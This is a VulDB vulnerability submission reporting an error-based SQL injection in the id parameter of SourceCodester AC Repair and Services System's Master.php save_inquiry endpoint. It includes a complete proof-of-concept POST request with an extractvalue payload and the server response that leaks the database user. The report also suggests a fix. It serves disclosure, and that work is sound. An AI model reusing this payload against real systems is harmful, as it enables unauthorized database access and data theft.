Invia #182098: SourceCodester AC Repair and Services System sql injectioninformazioni

Titolo	SourceCodester AC Repair and Services System sql injection
Descrizione	I have discovered a SQL injection vulnerability in the SourceCodester AC Repair and Services System(https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html) This affect the file /classes/Master.php?f=save_inquiry: POST /php-acrss/classes/Master.php?f=save_inquiry HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------2854294418240524322736048278 Content-Length: 913 Origin: http://localhost Connection: close Referer: http://localhost/php-acrss/admin/?page=bookings/manage_booking Cookie: PHPSESSID=avms7d982mr3recfih6r7sfun0 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="id" 1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))# -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="fullname" 111 -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="email" [email protected] -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="contact" 111 -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="address" 111 -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="services[]" 1 -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="status" 0 -----------------------------2854294418240524322736048278-- And it returns "{"status":"failed","err":"XPATH syntax error: '~admin@localhost~'[UPDATE `inquiry_list` set `fullname`='111' , `email`='[email protected]' , `contact`='111' , `address`='111' , `services`='' , `status`='0' where id = '1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))#' ]"}". This proves that there is an error injection vulnerability here The vulnerability exists because they all used the code "sql = "UPDATE inquiry_list set {data} where id = '{$id}' ";" without sufficient filtering on the controllable parameter id. This lack of filtering makes it possible for SQL injection attacks to occur. My suggestion for fixing this issue is to protect the id parameter from malicious exploitation by using mysqli_real_escape_string().
Fonte	⚠️ https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html
Utente	NNanfeng (UID 27153)
Sottomissione	13/07/2023 11:40 (3 anni fa)
Moderazione	13/07/2023 11:54 (14 minutes later)
Stato	Accettato
Voce VulDB	234015 [SourceCodester AC Repair and Services System 1.0 Master.php?f=save_inquiry ID iniezione SQL]
Punti	20

◂ Precedente Visione D'ensemble Il prossimo ▸

Do you want to use VulDB in your project?

Use the official API to access entries easily!